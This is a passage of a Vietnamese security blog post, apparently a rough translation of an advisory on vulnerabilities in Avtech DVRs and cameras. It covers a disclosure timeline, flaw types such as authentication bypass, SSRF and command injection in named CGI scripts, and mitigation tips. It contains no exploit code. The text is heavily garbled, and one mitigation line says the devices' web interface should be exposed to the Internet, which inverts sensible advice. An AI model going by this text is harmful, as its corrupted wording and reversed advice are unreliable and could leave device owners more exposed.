Do đó, wget bqua xác minh chng chmáy chvà mt cuc tn công MITM có thxy ra đi vi giao tiếp HTTPS.

Timeeline  ghi nhận lại các báo cáo về sự liên lạc từ Search-labs và Trend micro đến Avtech.
  • 2015.10.19: Lần đu tiên cgng liên lc vi Avtech, nhưng chúng tôi không nhn được phn hi 2016.05.24: Ln thhai liên lc Avtech mà không có bt kphn ng
  • 2016.05.27: Lần thba c-gắng liên lc vi Avtech bng cách gi e-mail đến các đa che-mail công cng ca Avtech. Chúng tôi đă không nhn được phn hi.
  • 2016.09.10: Cgng liên lc vi Avtech mà không có bt kphn ng.
  • 2016.10.11: Toàn bthông tin mrng Công trình POCPOC có sn đchng minh các vn đsau: Unauthenticated rò rthông tin (khnăng) Bqua xác thc (.cab, không ai) Unauthenticated SSRF trên các thiết bDVR Đă vô hiu hóa lnh tiêm trên các thiết bDVRLogin captcha bqua vi đăng nhp =quick hoc hướng dn sdng cookie injectionCloudSetup.cgi   lnh tiêm sau khi tiêm lnh authenticationadcommand.cgi sau khi xác thc
 Mt loạt phản ảnh bằng youtube video cũng có sn , trong đó trình bày mt svn đtrên.

Khuyến ngh 

 Tht không may ''Hin ti không có gii pháp nào cho nhng lhng này ''.

Thêm thông tin kỹ thuật về Avtech camera.: Click tải về   từ nguồn antoanvn diy.

Bn có ththc hin các bước sau đbo vthiết bca bn tạm thời:
ü Thay đi mt khu qun trmc đnh.
ü Nên phơi bày giao din web ca bt kthiết bAvtech nào vi Internet

Chúng tôi lưu ý rng các lhng trên đă được tìm thy trong mt khong thi gian ngn mà không có cách tiếp cn có hthng.

Da vào các loi lhng mà chúng tôi tìm thy và cht lượng mă nhìn tng th, các thiết bị sau này nên cho cài bản vá tương tự mới , nếu không có thì khả năng camera còn chất-cha nhiu vn đhơn.

Antoanvn.com 2017@antoanvn the security diy -elearning-training in Vi language


Bài đăng nổi bật

Hướng dẫn lắp đặt hệ thống báo cháy Nohmi Japan.

Hệ thống báo cháy tự động Nohmi của nhà sx Nohmi Bosai Japan là một trong những hệ thống báo cháy tiêu chuẩn quốc tế, loại 24V đáp ứ...